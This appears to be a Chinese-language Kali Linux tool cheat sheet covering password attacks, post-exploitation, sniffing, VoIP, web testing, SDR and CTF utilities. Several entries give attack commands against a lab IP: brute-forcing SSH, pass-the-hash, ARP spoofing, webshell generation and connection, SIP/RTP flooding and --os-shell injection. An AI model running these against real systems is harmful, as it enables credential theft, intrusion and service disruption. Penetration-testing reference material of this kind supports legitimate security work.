ncrack ssh://192.168.56.106 -u admin -P /usr/share/wordlists/rockyou.txt
ncrack ftp://192.168.56.106 -U users.txt -P pass.txt常用参数
bash
-p pass / -P pass.txt # 密码
-u user / -U users.txt # 用户
ssh://host # 服务目标
-T4 # 速度模板ophcrack密码工具常用命令
所属分类:密码攻击
常用命令
bash
ophcrack --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ophcrack-cli密码工具常用命令
所属分类:密码攻击
常用命令
bash
ophcrack-cli --help常用参数
bash
--help # 查看帮助
man tool # 查看手册pack密码工具常用命令
所属分类:密码攻击
常用命令
bash
pack --help常用参数
bash
--help # 查看帮助
man tool # 查看手册pack2密码工具常用命令
所属分类:密码攻击
常用命令
bash
pack2 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册passing-the-hash哈希传递
所属分类:密码攻击
常用命令
bash
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:NTLM //192.168.56.106 cmd
pth-smbclient -U user%LMHASH:NTHASH //192.168.56.106/share常用参数
bash
-U user%LMHASH:NTHASH # 指定LM/NTLM哈希patator多协议爆破
所属分类:密码攻击 / Web
常用命令
bash
patator ssh_login host=192.168.56.106 user=admin password=FILE0 0=/usr/share/wordlists/rockyou.txt
patator http_fuzz url=http://192.168.56.106/login method=POST body='u=admin&p=FILE0' 0=rockyou.txt -x ignore:fgrep='invalid'常用参数
bash
-x ignore:fgrep='str' # 忽略匹配文本
FILE0 # 第一个payload文件占位符
ssh_login/http_fuzz/ftp_login # 模块pdfcrackPDF密码破解
所属分类:密码攻击
常用命令
bash
pdfcrack -f secret.pdf -w /usr/share/wordlists/rockyou.txt
pdfcrack -f secret.pdf -o ownerpass常用参数
bash
-w dict.txt # 字典
-f secret.pdf # 目标PDF
-o ownerpass # 指定owner密码pipal密码工具常用命令
所属分类:密码攻击 / 报告
常用命令
bash
pipal --help常用参数
bash
--help # 查看帮助
man tool # 查看手册rainbowcrack彩虹表破解
所属分类:密码攻击
常用命令
bash
rcrack . -h hashes.txt
rtgen md5 loweralpha 1 7 0 2400 1000000 0常用参数
bash
rcrack . -h file # 用已有彩虹表破解
rtgen ... # 生成彩虹表
rtsort tables # 排序彩虹表rarcrack压缩包密码破解
所属分类:密码攻击
常用命令
bash
rarcrack secret.rar
rarcrack secret.zip --threads 4常用参数
bash
--threads 4 # 线程数
支持 rar/zip/7z # 压缩包类型rcracki-mt密码工具常用命令
所属分类:密码攻击
常用命令
bash
rcracki-mt --help常用参数
bash
--help # 查看帮助
man tool # 查看手册rsmangler密码工具常用命令
所属分类:密码攻击
常用命令
bash
rsmangler --help常用参数
bash
--help # 查看帮助
man tool # 查看手册SecLists安全字典集合
所属分类:密码攻击
常用命令
bash
ls /usr/share/seclists
find /usr/share/seclists -iname '*subdomain*'常用参数
bash
/usr/share/seclists # 字典根目录
Discovery # 发现类字典
Passwords # 密码类字典
Fuzzing # 模糊测试payload
Web-Shells # WebShell资源sipcrack密码工具常用命令
所属分类:密码攻击 / VoIP
常用命令
bash
sipcrack --help常用参数
bash
--help # 查看帮助
man tool # 查看手册sipvicious SIP枚举与爆破
所属分类:密码攻击 / VoIP / 漏洞分析
常用命令
bash
svmap 192.168.56.106
svwar -m INVITE -e100-200 192.168.56.106常用参数
bash
svcrack # 口令爆破
svmap # 发现SIP服务
svwar # 分机枚举statsprocessor密码工具常用命令
所属分类:密码攻击
常用命令
bash
statsprocessor --help常用参数
bash
--help # 查看帮助
man tool # 查看手册sucrack密码工具常用命令
所属分类:密码攻击
常用命令
bash
sucrack --help常用参数
bash
--help # 查看帮助
man tool # 查看手册thc-pptp-bruter密码工具常用命令
所属分类:密码攻击
常用命令
bash
thc-pptp-bruter --help常用参数
bash
--help # 查看帮助
man tool # 查看手册wordlists常用字典包
所属分类:密码攻击
常用命令
bash
ls /usr/share/wordlists
gzip -d /usr/share/wordlists/rockyou.txt.gz常用参数
bash
/usr/share/wordlists # 常用字典目录
rockyou.txt # 常用口令字典cymothoa后渗透工具常用命令
所属分类:后渗透
常用命令
bash
cymothoa --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dbd后渗透工具常用命令
所属分类:后渗透 / Windows资源
常用命令
bash
dbd --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dns2tcp后渗透工具常用命令
所属分类:后渗透
常用命令
bash
dns2tcp --help常用参数
bash
--help # 查看帮助
man tool # 查看手册exe2hexbat后渗透工具常用命令
所属分类:后渗透
常用命令
bash
exe2hexbat --help常用参数
bash
--help # 查看帮助
man tool # 查看手册iodine后渗透工具常用命令
所属分类:后渗透
常用命令
bash
iodine --help常用参数
bash
--help # 查看帮助
man tool # 查看手册Laudanum WebShell资源包
所属分类:后渗透 / Web
常用命令
bash
find /usr/share/laudanum -type f | head
ls /usr/share/laudanum常用参数
bash
/usr/share/laudanum # WebShell资源目录miredo后渗透工具常用命令
所属分类:后渗透
常用命令
bash
miredo --help常用参数
bash
--help # 查看帮助
man tool # 查看手册nishang后渗透工具常用命令
所属分类:后渗透 / Web
常用命令
bash
nishang --help常用参数
bash
--help # 查看帮助
man tool # 查看手册powersploit后渗透工具常用命令
所属分类:后渗透
常用命令
bash
powersploit --help常用参数
bash
--help # 查看帮助
man tool # 查看手册proxychains4后渗透工具常用命令
所属分类:后渗透 / Web
常用命令
bash
proxychains4 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册proxytunnel后渗透工具常用命令
所属分类:后渗透 / Web
常用命令
bash
proxytunnel --help常用参数
bash
--help # 查看帮助
man tool # 查看手册ptunnel后渗透工具常用命令
所属分类:后渗透
常用命令
bash
ptunnel --help常用参数
bash
--help # 查看帮助
man tool # 查看手册pwnat后渗透工具常用命令
所属分类:后渗透
常用命令
bash
pwnat --help常用参数
bash
--help # 查看帮助
man tool # 查看手册sbd后渗透工具常用命令
所属分类:后渗透 / Windows资源
常用命令
bash
sbd --help常用参数
bash
--help # 查看帮助
man tool # 查看手册shellter后渗透工具常用命令
所属分类:后渗透 / Windows资源
常用命令
bash
shellter --help常用参数
bash
--help # 查看帮助
man tool # 查看手册stunnel4后渗透工具常用命令
所属分类:后渗透 / Web
常用命令
bash
stunnel4 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册udptunnel后渗透工具常用命令
所属分类:后渗透
常用命令
bash
udptunnel --help常用参数
bash
--help # 查看帮助
man tool # 查看手册Veil免杀载荷生成
所属分类:后渗透 / 社工
常用命令
bash
veil常用参数
bash
图形/交互式工具 # 常用于载荷混淆与生成webacoo WebShell管理
所属分类:后渗透 / Web
常用命令
bash
webacoo -g -o shell.php
webacoo -t -u http://192.168.56.106/shell.php -e 'id'常用参数
bash
-u URL # shell地址
-e 'id' # 执行命令
-g # 生成webshell
-t # 连接webshellweevely PHP WebShell管理
所属分类:后渗透 / Web
常用命令
bash
weevely generate pass shell.php
weevely http://192.168.56.106/shell.php pass常用参数
bash
URL password # 连接shell
generate pass shell.php # 生成shellcutycapt网页截图
所属分类:报告 / Web
常用命令
bash
cutycapt --url=http://192.168.56.106 --out=shot.png
cutycapt --url=http://192.168.56.106 --out=shot.pdf常用参数
bash
--url=URL # 目标URL
--out=file.png # 输出文件Dradis协作报告平台
所属分类:报告
常用命令
bash
dradis
dradis-ce常用参数
bash
Web平台 # 用于团队协作与报告整理EyeWitness网页截图与指纹
所属分类:报告 / Web
常用命令
bash
EyeWitness --web -f urls.txt --threads 10
EyeWitness --single http://192.168.56.106 --web常用参数
bash
--single URL # 单个目标
-f urls.txt # URL列表
--threads 10 # 线程数
--web # Web模式Faraday协作渗透平台
所属分类:报告
常用命令
bash
faraday-client
faraday-server常用参数
bash
client/server # 客户端与服务端
Web界面 # 汇总多工具结果recordmydesktop图形化工具
所属分类:报告
常用命令
bash
recordmydesktop常用参数
bash
--help # 查看帮助
图形/交互式工具 # 以启动后菜单/界面为主Ghidra逆向分析
所属分类:应急响应 / CTF常用补充
常用命令
bash
ghidra
analyzeHeadless /tmp/proj demo -import sample.bin常用参数
bash
ghidra # 启动图形界面
analyzeHeadless # 无头分析入口
-import sample.bin # 导入文件
-overwrite # 覆盖已有项目
-scriptPath dir # 指定脚本目录
-postScript script.py # 分析后执行脚本
-process all # 批量处理项目文件hashrat应急工具常用命令
所属分类:应急响应
常用命令
bash
hashrat --help常用参数
bash
--help # 查看帮助
man tool # 查看手册netsniff-ng高性能抓包
所属分类:应急响应 / 嗅探欺骗
常用命令
bash
netsniff-ng -i eth0
netsniff-ng -i eth0 -o out.pcap常用参数
bash
-i eth0 # 网卡
-o out.pcap # 输出文件clang逆向工具常用命令
所属分类:逆向
常用命令
bash
clang --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dex2jar DEX转JAR
所属分类:逆向
常用命令
bash
d2j-dex2jar.sh classes.dex
d2j-apk-sign.sh app.apk常用参数
bash
常与JD-GUI/JADX联动 # 安卓逆向JD-GUI图形化Java反编译
所属分类:逆向
常用命令
bash
jd-gui
java -jar /usr/share/jd-gui/jd-gui.jar常用参数
bash
图形界面工具 # 查看JAR/CLASSrizin逆向分析
所属分类:逆向
常用命令
bash
rizin -A ./a.out
rz-bin -I ./a.out常用参数
bash
-A # 自动分析
aaa # 深度分析
afl # 函数列表
pdf @ main # 反汇编函数
px 64 @ rsp # 查看内存
izz # 查看字符串
iI # 文件信息
V # 可视化模式
db main # 下断点
dc # 继续运行GNU Radio SDR流程开发
所属分类:RFID / SDR
常用命令
bash
gnuradio-companion
python3 flowgraph.py常用参数
bash
gnuradio-companion # 图形化流程图Proxmark3 RFID工具
所属分类:RFID
常用命令
bash
proxmark3 /dev/ttyACM0
hf search常用参数
bash
dump # 读卡/导出
hf search # 高频卡搜索
lf search # 低频卡搜索rfdump MIFARE操作
所属分类:RFID
常用命令
bash
rfdump -h
rfdump -i常用参数
bash
以读卡器环境为主 # 具体参数依设备而定chirpSDR工具常用命令
所属分类:SDR
常用命令
bash
chirp --help常用参数
bash
--help # 查看帮助
man tool # 查看手册gqrx-sdr频谱接收
所属分类:SDR
常用命令
bash
gqrx-sdr常用参数
bash
图形界面工具 # SDR频谱观察gr-air-modesSDR工具常用命令
所属分类:SDR
常用命令
bash
gr-air-modes --help常用参数
bash
--help # 查看帮助
man tool # 查看手册gr-iqbalSDR工具常用命令
所属分类:SDR
常用命令
bash
gr-iqbal --help常用参数
bash
--help # 查看帮助
man tool # 查看手册gr-osmosdrSDR工具常用命令
所属分类:SDR
常用命令
bash
gr-osmosdr --help常用参数
bash
--help # 查看帮助
man tool # 查看手册HackRF SDR设备工具
所属分类:SDR
常用命令
bash
hackrf_info
hackrf_transfer -r capture.iq -f 433920000 -s 2000000常用参数
bash
-r capture.iq # 录制IQ
-f freq # 频率
-s rate # 采样率
hackrf_info # 查看设备inspectrumSDR工具常用命令
所属分类:SDR
常用命令
bash
inspectrum --help常用参数
bash
--help # 查看帮助
man tool # 查看手册kalibrate-rtlSDR工具常用命令
所属分类:SDR
常用命令
bash
kalibrate-rtl --help常用参数
bash
--help # 查看帮助
man tool # 查看手册multimon-ng无线解码
所属分类:SDR
常用命令
bash
multimon-ng -a POCSAG1200 capture.wav
rtl_fm ... | multimon-ng -t raw -a POCSAG1200 -常用参数
bash
-a protocol # 指定协议
-t raw|wav # 输入类型uhd-hostSDR工具常用命令
所属分类:SDR
常用命令
bash
uhd-host --help常用参数
bash
--help # 查看帮助
man tool # 查看手册uhd-images资源包与常用路径
所属分类:SDR
常用命令
bash
ls /usr/share/uhd/images
find /usr/share/uhd/images -type f | head常用参数
bash
/usr/share/uhd/images # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令above嗅探/欺骗工具常用命令
所属分类:嗅探欺骗
常用命令
bash
above常用参数
bash
用于网络异常/攻击行为测试 # 按帮助选择模块
--help # 查看帮助darkstat流量统计
所属分类:嗅探欺骗
常用命令
bash
darkstat -i eth0常用参数
bash
-i eth0 # 网卡dnschef伪造DNS响应
所属分类:嗅探欺骗 / Windows资源
常用命令
bash
dnschef --fakeip 192.168.56.1
dnschef --fakedomains test.local --fakeip 192.168.56.1常用参数
bash
--fakedomains domain # 伪造域名
--fakeip IP # 假解析IPdriftnet图片抓取
所属分类:嗅探欺骗
常用命令
bash
driftnet -i eth0
driftnet -i eth0 -d out常用参数
bash
-i eth0 # 网卡
-d out # 输出目录dsniff口令抓取
所属分类:嗅探欺骗
常用命令
bash
dsniff -i eth0
dsniff -i eth0 -p常用参数
bash
-i eth0 # 网卡
-p # 不启用混杂模式ettercap中间人与协议嗅探
所属分类:嗅探欺骗
常用命令
bash
ettercap -T -M arp:remote /192.168.56.106/ /192.168.56.1/
ettercap -G常用参数
bash
-i eth0 # 指定网卡
-M arp:remote # ARP欺骗
-T # 文本模式
-G # 图形界面ferret-sidejack嗅探/欺骗工具常用命令
所属分类:嗅探欺骗 / Web
常用命令
bash
ferret-sidejack --help常用参数
bash
--help # 查看帮助
man tool # 查看手册fiked嗅探/欺骗工具常用命令
所属分类:嗅探欺骗
常用命令
bash
fiked常用参数
bash
常用于无线相关测试 # 具体参数依场景而定
--help # 查看帮助hamster-sidejack嗅探/欺骗工具常用命令
所属分类:嗅探欺骗 / Web
常用命令
bash
hamster-sidejack --help常用参数
bash
--help # 查看帮助
man tool # 查看手册hexinject嗅探/欺骗工具常用命令
所属分类:嗅探欺骗
常用命令
bash
hexinject --help常用参数
bash
--help # 查看帮助
man tool # 查看手册isr-evilgrade嗅探/欺骗工具常用命令
所属分类:嗅探欺骗
常用命令
bash
isr-evilgrade --help常用参数
bash
--help # 查看帮助
man tool # 查看手册mitmproxyHTTP/HTTPS中间人代理
所属分类:嗅探欺骗 / Web
常用命令
bash
mitmproxy -p 8080
mitmweb --listen-port 8080常用参数
bash
-p 8080 # 监听端口
--mode transparent # 透明代理模式
--set block_global=false # 允许外部连接rebindDNS Rebinding测试
所属分类:嗅探欺骗
常用命令
bash
rebind常用参数
bash
DNS Rebinding测试工具 # 按帮助使用sniffjoke反嗅探干扰
所属分类:嗅探欺骗
常用命令
bash
sniffjoke -i eth0常用参数
bash
-i eth0 # 网卡sslsniff SSL嗅探
所属分类:嗅探欺骗 / Web
常用命令
bash
sslsniff -i eth0常用参数
bash
-i eth0 # 网卡sslsplit SSL中间人拆分
所属分类:嗅探欺骗 / Web
常用命令
bash
sslsplit -D -l connections.log -j /tmp/sslsplit -S /tmp/sslsplit https 0.0.0.0 8443常用参数
bash
-D # 前台调试
-j dir / -S dir # 证书/会话目录
-l log # 连接日志enumiax IAX枚举
所属分类:VoIP / 漏洞分析
常用命令
bash
enumiax 192.168.56.106
enumiax -m 0 192.168.56.106常用参数
bash
-m 0 # 模式iaxflood IAX洪泛
所属分类:VoIP / 漏洞分析
常用命令
bash
iaxflood 192.168.56.106常用参数
bash
直接接主机 # VoIP测试inviteflood SIP INVITE洪泛
所属分类:VoIP / 漏洞分析
常用命令
bash
inviteflood 192.168.56.106 5060常用参数
bash
host port # 目标与端口libfindrtp资源包与常用路径
所属分类:VoIP
常用命令
bash
ls /usr/bin
find /usr/bin -type f | head常用参数
bash
/usr/bin # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令ohrwurm RTP媒体攻击
所属分类:VoIP / 漏洞分析
常用命令
bash
ohrwurm -h
ohrwurm常用参数
bash
交互式工具 # VoIP媒体流攻击protos-sip SIP健壮性测试
所属分类:VoIP / 漏洞分析
常用命令
bash
protos-sip 192.168.56.106常用参数
bash
直接接目标 # SIP协议测试rtpbreak RTP中断
所属分类:VoIP / 漏洞分析
常用命令
bash
rtpbreak 192.168.56.106常用参数
bash
直接接目标 # VoIP测试rtpflood RTP洪泛
所属分类:VoIP / 漏洞分析
常用命令
bash
rtpflood 192.168.56.106常用参数
bash
直接接目标 # VoIP测试rtpinsertsound RTP插音
所属分类:VoIP / 漏洞分析
常用命令
bash
rtpinsertsound 192.168.56.106 sound.wav常用参数
bash
host sound.wav # 目标与音频rtpmixsound RTP混音
所属分类:VoIP / 漏洞分析
常用命令
bash
rtpmixsound 192.168.56.106 sound.wav常用参数
bash
host sound.wav # 目标与音频sctpscanVoIP工具常用命令
所属分类:VoIP / 漏洞分析
常用命令
bash
sctpscan --help常用参数
bash
--help # 查看帮助
man tool # 查看手册siparmyknifeVoIP工具常用命令
所属分类:VoIP / 漏洞分析
常用命令
bash
siparmyknife --help常用参数
bash
--help # 查看帮助
man tool # 查看手册SIPp SIP压测与脚本模拟
所属分类:VoIP / 漏洞分析
常用命令
bash
sipp 192.168.56.106
sipp -sf scenario.xml 192.168.56.106常用参数
bash
-r 10 # 呼叫速率
-sf scenario.xml # 自定义场景voiphopper语音VLAN跳转
所属分类:VoIP / 漏洞分析
常用命令
bash
voiphopper -i eth0常用参数
bash
-i eth0 # 网卡bed漏洞分析工具常用命令
所属分类:漏洞分析
常用命令
bash
bed --help常用参数
bash
--help # 查看帮助
man tool # 查看手册cisco-global-exploiter漏洞分析工具常用命令
所属分类:漏洞分析
常用命令
bash
cisco-global-exploiter --help常用参数
bash
--help # 查看帮助
man tool # 查看手册cisco-ocs漏洞分析工具常用命令
所属分类:漏洞分析
常用命令
bash
cisco-ocs --help常用参数
bash
--help # 查看帮助
man tool # 查看手册cisco-torch漏洞分析工具常用命令
所属分类:漏洞分析
常用命令
bash
cisco-torch --help常用参数
bash
--help # 查看帮助
man tool # 查看手册copy-router-config漏洞分析工具常用命令
所属分类:漏洞分析
常用命令
bash
copy-router-config --help常用参数
bash
--help # 查看帮助
man tool # 查看手册dhcpig漏洞分析工具常用命令
所属分类:漏洞分析
常用命令
bash
dhcpig --help常用参数
bash
--help # 查看帮助
man tool # 查看手册gvmOpenVAS漏洞扫描
所属分类:漏洞分析
常用命令
bash
gvm-start
greenbone-feed-sync常用参数
bash
greenbone-feed-sync # 更新漏洞库
gvm-start # 启动服务
gvm-stop # 停止服务
Web界面 # 常用于完整漏洞扫描PEASS提权信息收集
所属分类:漏洞分析
常用命令
bash
linpeas.sh
winPEASx64.exe常用参数
bash
linpeas.sh # Linux提权枚举
winPEASx64.exe # Windows提权枚举siege漏洞分析工具常用命令
所属分类:漏洞分析 / Web
常用命令
bash
siege --help常用参数
bash
--help # 查看帮助
man tool # 查看手册sipsak SIP测试
所属分类:漏洞分析
常用命令
bash
sipsak -s sip:100@192.168.56.106
sipsak -U -s sip:100@192.168.56.106常用参数
bash
-U # 用户代理模式
-s sip:user@host # SIP URIslowhttptest漏洞分析工具常用命令
所属分类:漏洞分析 / Web
常用命令
bash
slowhttptest --help常用参数
bash
--help # 查看帮助
man tool # 查看手册t50漏洞分析工具常用命令
所属分类:漏洞分析
常用命令
bash
t50 --help常用参数
bash
--help # 查看帮助
man tool # 查看手册thc-ssl-dos漏洞分析工具常用命令
所属分类:漏洞分析 / Web
常用命令
bash
thc-ssl-dos --help常用参数
bash
--help # 查看帮助
man tool # 查看手册unix-privesc-checkUnix提权检查
所属分类:漏洞分析
常用命令
bash
unix-privesc-check standard
unix-privesc-check detailed常用参数
bash
standard # 标准检查
detailed # 详细检查yersinia漏洞分析工具常用命令
所属分类:漏洞分析
常用命令
bash
yersinia --help常用参数
bash
--help # 查看帮助
man tool # 查看手册apache-usersWeb工具常用命令
所属分类:Web
常用命令
bash
apache-users --help常用参数
bash
--help # 查看帮助
man tool # 查看手册cadaver WebDAV访问
所属分类:Web
常用命令
bash
cadaver http://192.168.56.106/webdav/
cadaver https://192.168.56.106/webdav/常用参数
bash
ls / put / get / delete # 交互命令Commix命令注入测试
所属分类:Web
常用命令
bash
commix -u 'http://192.168.56.106/?cmd=1'
commix -r request.txt --batch常用参数
bash
--batch # 自动确认
-r request.txt # 请求文件
-u URL # 目标
--os-shell # 尝试shelldavtest WebDAV测试
所属分类:Web
常用命令
bash
davtest -url http://192.168.56.106/webdav/
davtest -url http://192.168.56.106/webdav/ -auth user:pass常用参数
bash
-url URL # 目标
-auth user:pass # 认证dotdotpwnWeb工具常用命令
所属分类:Web
常用命令
bash
dotdotpwn --help常用参数
bash
--help # 查看帮助
man tool # 查看手册hakrawler页面链接爬取
所属分类:Web
常用命令
bash
echo 'http://192.168.56.106' | hakrawler
cat urls.txt | hakrawler -depth 2常用参数
bash
-depth 2 # 爬取深度
-plain # 纯文本输出heartleech Heartbleed测试
所属分类:Web / Windows资源
常用命令
bash
heartleech 192.168.56.106 -p 443常用参数
bash
-p 443 # 端口httprint HTTP指纹识别
所属分类:Web
常用命令
bash
httprint -h 192.168.56.106 -s signatures.txt
httprint -P0 -h 192.168.56.106常用参数
bash
-h host # 目标
-P0 # 关闭探测
-s signatures.txt # 签名库HTTrack站点镜像
所属分类:Web
常用命令
bash
httrack http://192.168.56.106 -O mirror
httrack 'http://192.168.56.106/*' -O mirror常用参数
bash
-O dir # 输出目录jboss-autopwn JBoss利用
所属分类:Web
常用命令
bash
jboss-autopwn.py -i 192.168.56.106
jboss-autopwn.py -f hosts.txt常用参数
bash
-i host # 单主机
-f hosts.txt # 主机列表joomscanJoomla扫描
所属分类:Web
常用命令
bash
joomscan -u http://192.168.56.106
joomscan -u http://192.168.56.106 --enumerate-components常用参数
bash
-u URL # 目标URL
--ec # 枚举组件简写
--enumerate-components # 枚举组件owasp-mantra-ffWeb工具常用命令
所属分类:Web
常用命令
bash
owasp-mantra-ff
firefox常用参数
bash
已较老的浏览器审计环境 # 主要作为审计环境使用padbuster Padding Oracle测试
所属分类:Web
常用命令
bash
padBuster http://192.168.56.106/index.php ENCVAL 8
padBuster URL ENCVAL 8 -cookies 'auth=ENCVAL'常用参数
bash
-cookies 'a=b' # 指定Cookie
URL ENCVAL BLOCKSIZE # 基本参数Paros旧版Web代理
所属分类:Web
常用命令
bash
paros常用参数
bash
图形界面工具 # 老牌Web代理/扫描工具redsocksWeb工具常用命令
所属分类:Web
常用命令
bash
redsocks --help常用参数
bash
--help # 查看帮助
man tool # 查看手册skipfish Web扫描
所属分类:Web
常用命令
bash
skipfish -o out http://192.168.56.106
skipfish -o out -I login.php http://192.168.56.106常用参数
bash
-I path # 包含路径
-X path # 排除路径
-o out # 输出目录uniscanWeb工具常用命令
所属分类:Web
常用命令
bash
uniscan --help常用参数
bash
--help # 查看帮助
man tool # 查看手册watobo Web代理审计
所属分类:Web
常用命令
bash
watobo常用参数
bash
图形界面工具 # Web应用安全测试代理WebScarab旧版Web代理
所属分类:Web
常用命令
bash
webscarab常用参数
bash
图形界面工具 # 手工Web测试webshells样本资源包
所属分类:Web
常用命令
bash
find /usr/share/webshells -type f | head
ls /usr/share/webshells常用参数
bash
/usr/share/webshells # WebShell样本目录xsserXSS测试
所属分类:Web
常用命令
bash
xsser --url 'http://192.168.56.106/search.php?q=XSS'
xsser --url 'http://192.168.56.106/search.php?q=XSS' --auto常用参数
bash
--url URL # 目标URL
--auto # 自动模式
--cookie 'a=b' # 指定Cookie
--user-agent 'UA' # 自定义UAhyperionWindows资源常用命令
所属分类:Windows资源
常用命令
bash
hyperion --help常用参数
bash
--help # 查看帮助
man tool # 查看手册powercat资源包与常用路径
所属分类:Windows资源
常用命令
bash
ls /usr/share/windows-resources
find /usr/share/windows-resources -type f | head常用参数
bash
/usr/share/windows-resources # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令windows-binaries资源包与常用路径
所属分类:Windows资源
常用命令
bash
ls /usr/share/windows-resources/binaries
find /usr/share/windows-resources/binaries -type f | head常用参数
bash
/usr/share/windows-resources/binaries # 常用资源路径
适合与其他工具联动使用 # 该包本身可能没有统一主命令windows-privesc-checkWindows资源常用命令
所属分类:Windows资源
常用命令
bash
windows-privesc-check2.exe > report.txt常用参数
bash
Windows环境运行 # 权限提升检查脚本/程序AdaptixC2后渗透与对抗模拟
所属分类:新增2026.1
常用命令
bash
adaptixc2常用参数
bash
框架型工具 # 适合后渗透与红队编排
--help # 查看帮助Atomic-Operator原子测试执行
所属分类:新增2026.1
常用命令
bash
atomic-operator run --atomics-path ./atomics T1003常用参数
bash
--atomics-path PATH # Atomic Red Team路径
run # 执行测试Fluxion无线社工审计
所属分类:新增2026.1
常用命令
bash
fluxion常用参数
bash
交互式工具 # 常见于无线社工演示/审计GEFGDB增强插件
所属分类:新增2026.1 / CTF常用补充
常用命令
bash
gdb -q ./a.out
gef config常用参数
bash
checksec # 检查保护
context # 显示上下文
pattern create 200 # 生成模式串
pattern search 0x6161616c # 查找偏移MetasploitMCP与Metasploit联动
所属分类:新增2026.1
常用命令
bash
metasploitmcp常用参数
bash
--help # 查看帮助SSTImap模板注入检测
所属分类:新增2026.1
常用命令
bash
sstimap.py -u 'http://192.168.56.106/?name=test'
sstimap.py -r request.txt常用参数
bash
-r request.txt # 原始请求
-u URL # 目标URL
--os-shell # 尝试命令执行WPProbeWordPress插件枚举
所属分类:新增2026.1
常用命令
bash
wpprobe -u http://192.168.56.106
wpprobe -u http://192.168.56.106 -w plugins.txt常用参数
bash
-u URL # 目标
-w wordlist.txt # 插件字典XSStrike高级XSS扫描
所属分类:新增2026.1
常用命令
bash
xsstrike -u 'http://192.168.56.106/search.php?q=test'
xsstrike -u 'http://192.168.56.106/search.php?q=test' --crawl常用参数
bash
-u URL # 目标URL
--data 'a=b&c=d' # POST数据
--file request.txt # 读取请求文件
--crawl # 爬虫模式
--headers # 自定义头digDNS查询与区域传送测试
所属分类:CTF常用补充
常用命令
bash
dig example.com any
dig @192.168.56.106 example.com axfr常用参数
bash
@server # 指定DNS服务器
axfr # 区域传送
+short # 简短输出WHOIS域名归属查询
所属分类:CTF常用补充
常用命令
bash
whois example.com
whois 8.8.8.8常用参数
bash
直接接域名或IP # 查询归属tmux终端复用
所属分类:CTF常用补充
常用命令
bash
tmux new -s pentest
tmux attach -t pentest常用参数
bash
Ctrl+b " # 上下分屏
Ctrl+b % # 左右分屏
Ctrl+b c # 新建窗口
Ctrl+b d # 分离会话python3本地HTTP与快速脚本
所属分类:CTF常用补充
常用命令
bash
python3 -m http.server 8000
python3 -c 'import pty; pty.spawn("/bin/bash")'常用参数
bash
-c 'code' # 执行一段Python代码
-m http.server 8000 # 快速起HTTP服务gcc编译与静态编译
所属分类:CTF常用补充
常用命令
bash
gcc -o exp exp.c
gcc -static -o exp exp.c常用参数
bash
-m32 # 32位编译
-g # 带调试符号
-static # 静态链接
-o exp # 输出文件strace系统调用跟踪
所属分类:CTF常用补充
常用命令
bash
strace ./a.out
strace -f -o trace.txt ./a.out常用参数
bash
-f # 跟踪子进程
-p 1234 # 附加进程
-o trace.txt # 输出文件
-s 128 # 字符串长度
-xx # 十六进制显示数据
-e trace=network # 仅跟踪网络调用
-e trace=file # 仅跟踪文件操作
-c # 统计模式
-tt # 显示时间戳ltrace库调用跟踪
所属分类:CTF常用补充
常用命令
bash
ltrace ./a.out
ltrace -f -o ltrace.txt ./a.out常用参数
bash
-f # 跟踪子进程
-o ltrace.txt # 输出文件
-s 128 # 字符串长度
-e malloc+free # 仅跟踪指定库调用
-p 1234 # 附加进程
-c # 统计模式objdump反汇编
所属分类:CTF常用补充
常用命令
bash
objdump -d ./a.out | less
objdump -Mintel -d ./a.out | grep '<main>' -A 30
objdump -s -j .rodata ./a.out | less常用参数
bash
-d # 反汇编代码段
-D # 反汇编所有段
-M intel # Intel语法
-t # 符号表
-T # 动态符号表
-R # 重定位信息
-x # 头信息
-s -j .rodata # 查看指定段内容strings字符串提取
所属分类:CTF常用补充
常用命令
bash
strings ./a.out
strings -n 8 ./a.out常用参数
bash
-n 8 # 最小字符串长度
-a # 扫描整个文件
-t x # 以十六进制显示偏移
-e l|b|s # 指定编码
-f # 输出文件名file文件类型识别
所属分类:CTF常用补充
常用命令
bash
file ./a.out
file secret.bin常用参数
bash
-k # 显示更多识别结果checksec保护机制检查
所属分类:CTF常用补充
常用命令
bash
checksec --file=./a.out
checksec --proc=1234常用参数
bash
--file=FILE # 检查文件
--proc=PID # 检查进程
--dir=. # 批量检查目录
--fortify-file=FILE # 检查FORTIFY
--format=json # JSON输出ROPgadgetROP链查找
所属分类:CTF常用补充
常用命令
bash
ROPgadget --binary ./a.out
ROPgadget --binary ./a.out --only 'pop|ret'常用参数
bash
--binary ./a.out # 目标二进制
--only 'pop|ret' # 仅查找指定类型gadget
--badbytes '00|0a' # 过滤坏字节
--depth 10 # 搜索深度
--string '/bin/sh' # 查找字符串
--opcode c3 # 按机器码查找
--ropchain # 生成ROP链one_gadget查找libc利用点
所属分类:CTF常用补充
常用命令
bash
one_gadget /lib/x86_64-linux-gnu/libc.so.6
one_gadget libc.so.6 --raw常用参数
bash
--raw # 只输出偏移
-l 2 # 展示更多约束信息
-a amd64 # 指定架构
-o file.txt # 输出到文件pwntoolsPwn脚本开发
所属分类:CTF常用补充
常用命令
bash
python3 exploit.py
python3 -c 'from pwn import *; print(cyclic(200))'常用参数
bash
process('./a.out') # 本地起进程
remote(host,port) # 远程连接
context(os='linux',arch='amd64') # 上下文
cyclic()/cyclic_find() # 偏移查找
p64()/u64() # 地址打包/解包
ELF('./a.out') # 解析二进制
ROP(elf) # 构造ROP
gdb.attach(p) # 挂GDB
recvuntil()/sendline() # 常用收发
interactive() # 进入交互pwndbgGDB增强插件
所属分类:CTF常用补充
常用命令
bash
gdb -q ./a.out常用参数
bash
context # 显示上下文
telescope $rsp # 查看栈
vmmap # 查看内存映射rabin2二进制信息查看
所属分类:CTF常用补充
常用命令
bash
rabin2 -I ./a.out
rabin2 -z ./a.out常用参数
bash
-I # 基本信息
-s # 符号表
-z # 字符串hcxtools握手抓取与转换
所属分类:CTF常用补充
常用命令
bash
hcxdumptool -i wlan0mon -w capture.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 capture.pcapng常用参数
bash
-i wlan0mon # 无线接口
-w capture.pcapng # 输出抓包